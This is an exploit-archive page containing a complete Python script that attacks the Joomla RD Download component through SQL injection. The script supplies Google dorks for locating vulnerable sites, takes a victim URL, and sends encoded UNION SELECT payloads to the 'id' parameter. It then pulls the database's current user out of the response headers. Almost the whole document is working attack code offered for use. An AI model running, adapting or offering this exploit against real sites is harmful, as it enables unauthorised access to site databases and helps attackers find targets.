Joomla RD Download SQL Injection



EKU-ID: 4343 CVE: OSVDB-ID:
Author: Claudio Viviani Published: 2014-10-31 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
#
# Exploit Name: Joomla RD Download SQL Injection
#
# Version: Unknown
#
# Exploit discovered and written by Claudio Viviani
#
# Dork google 1:  inurl:index.php?option=com_rd_download
# Dork google 2:  inurl:/component/rd_download/
#
# Tested on BackBox 3.x
#
# http connection
import urllib, urllib2
# string manipulation
import re
# Errors management
import sys
# Args management
import optparse

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url

banner = """
           _______                      __                                         
          |   _   .-----.-----.--------|  .---.-.                                  
          |___|   |  _  |  _  |        |  |  _  |                                  
          |.  |   |_____|_____|__|__|__|__|___._|                                  
          |:  1   |                                                                
          |::.. . |                                                                
          `-------'                                                                
           _______ ______       ______                        __                __ 
          |   _   |   _  \     |   _  \ .-----.--.--.--.-----|  .-----.---.-.--|  |
          |.  l   |.  |   \    |.  |   \|  _  |  |  |  |     |  |  _  |  _  |  _  |
          |.  _   |.  |    \   |.  |    |_____|________|__|__|__|_____|___._|_____|
          |:  |   |:  1    /   |:  1    /                                          
          |::.|:. |::.. . /    |::.. . /                                           
          `--- ---`------'     `------'                                            
                                                    J00ml4 RD D0wnl04d Sql1nj3ct10n

                                      Written by:

                                    Claudio Viviani

                                 http://www.homelab.it

                                    info@homelab.it
                                homelabit@protonmail.ch

                            https://www.facebook.com/homelabit
                              https://twitter.com/homelabit
                            https://plus.google.com/+HomelabIt1/
                   https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

commandList = optparse.OptionParser('usage: %prog -t URL')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )

options, remainder = commandList.parse_args()

# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)

host = checkurl(options.target)

evilurl = { '/component/rd_download/?view=download&task=dl&id=-5469%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%23' : '/component/rd_download/?view=download&task=dl&id=[SQLi]',
            '/index.php?option=com_rd_download&view=download&task=dl&id=-5469%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%23' : '/index.php?option=com_rd_download&view=download&task=dl&id=[SQLi]' }

print(banner)

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}

for exploiting, dork in evilurl.iteritems():
   print "[*] Trying to connect to: "+host+dork
   try:
      req = urllib2.Request(host+exploiting, None, headers)
      response = urllib2.urlopen(req)

      response_header = response.info().getheader('Content-Disposition')
      if response_header:

         if "h0m3l4b1t" in response_header:
            print "[!] VULNERABLE"
            current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response_header).group(1)
            print "[*] Username: "+str(current_user)
            sys.exit(0)
         else:
            print "[X] Not vulnerable :("
      else:
         print "[X] Not vulnerable :("
   except urllib2.HTTPError as e:
      print("[X] Http Error: "+str(e.code))
   except urllib2.URLError as e:
      print("[X] Connection Error: "+str(e.code))
      sys.exit(1)